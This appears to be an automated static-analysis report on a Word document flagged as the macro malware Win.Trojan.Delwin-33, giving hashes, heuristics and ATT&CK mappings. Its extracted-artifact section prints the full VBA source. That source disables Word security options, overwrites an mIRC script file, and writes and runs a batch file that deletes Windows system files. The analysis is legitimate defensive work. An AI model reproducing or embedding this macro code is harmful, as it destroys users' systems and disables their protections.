Win.Trojan.Delwin-33 — Office (OLE) malware analysis

Static analysis result for SHA-256 02b6db994765785d…

MALICIOUS

Office (OLE)

Size: 31.0 KB
Created: 2002-08-30 13:03:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: c67f4e272c57c054e9649d8313022fba
SHA-1: 129fa96c5bfa2bdd6003ad2c77ffa8decd24c559
SHA-256: 02b6db994765785d3f78db27c6876b18c76bffe6452a844aa59800e7d2f80ae7
Risk Score: 320

Malware Insights

Win.Trojan.Delwin-33 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

This Office document contains VBA macros that execute automatically upon opening, as indicated by the Document_Open heuristic. The macros attempt to disable security features and write a file named 'peak.txt' to C:\WINDOWS\. The presence of Shell() calls and CreateObject suggests the execution of arbitrary code, likely to download and run a secondary payload. The ClamAV detection of 'Win.Trojan.Delwin-33' further supports its malicious nature.

Heuristics (6)

  • ClamAV: Win.Trojan.Delwin-33 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Delwin-33
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2945 bytes
SHA-256: 1807d7c36d97af1993d032019df6ddfa9e07ead9068063b340a1a2e4a49cb881
Detection
ClamAV: Win.Trojan.DelFil-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Document_Open()
On Error Resume Next
Open "C:\WINDOWS\peak.txt" For Output As #1
Print #1, "Peak"
Close #1
MsgBox "hi welcome to new virus peak"
End Sub

Sub Stealth()
Set fs = Application.FileSearch
es$ = "xdez.txt"
With fs
.LookIn = "C:\Program Files"
.SearchSubFolders = True
.FileName = es$
If .Execute > 0 Then
MsgBox "File Found"
Set ds = CreateObject("Scripting.FileSystemObject")
Object
Set fy = ds.GetFile(es$)
h = (fy.Path)
SetAttr h, vbNormal
Kill (h)
MsgBox "whats hapeening"
Else
MsgBox "del del del"
End If
End With
End Sub

Sub Document_Open()
CommandBars("Macro").Controls("Security...").Enabled = 0
CommandBars("Macro").Controls("Macros...").Enabled = 0
CommandBars("Tools").Controls("Customize...").Enabled = 0
CommandBars("View").Controls("Toolbars").Enabled = 0
CommandBars("View").Controls("Status Bar").Enabled = 0
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
CommandBars("Format").Controls("Style...").Enabled = 0
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
End Sub

Sub InfectMirc()
infe$ = "c:\mirc\script.ini"
Set fs = CreateObject("Scripting.FileSystemObject")
If fs.FileExists(infe$) Then GoTo mircwrite Else GoTo fling
mircwrite:
Open "c:\mirc\script.ini" For Output As #1
Print #1, "[Script]"
Print #1, "n0;Miniscript"
Print #1, "n1= ON 1:JOIN:#:{ /exit } "
Print #1, "n2= ON 1:*xde*:#:{ /exit };"
Close #1
SetAttr "c:\mirc\script.ini", vbReadOnly
GoTo finish
fling:
MsgBox "Invalid Memory Space", vbCritical
finish:
End Sub

Private Sub Form_Load()
On Error Resume Next
Open "C:\WINDOWS\peak2.txt" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "@del C:\windows\*.ini"
Print #1, "cls"
Print #1, "@del C:\windows\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.scr"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.exe"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.log"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.drv"
Print #1, "cls"
Print #1, "@del C:\windows\system32\*.dll"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.sys"
Print #1, "cls"
Print #1, "@del C:\windows\SYSTEM32\*.com"
Print #1, "cls"
Print #1, "@del C:\windows\system.ini"
Close #1
Name "C:\WINDOWS\peak2.txt" As "C:\WINDOWS\peak2.bat"
Shell "C:\WINDOWS\peak2.bat"
MsgBox "ur pc is gone", vbCritical
Kill "C:\WINDOWS\peak2.bat"
End
End Sub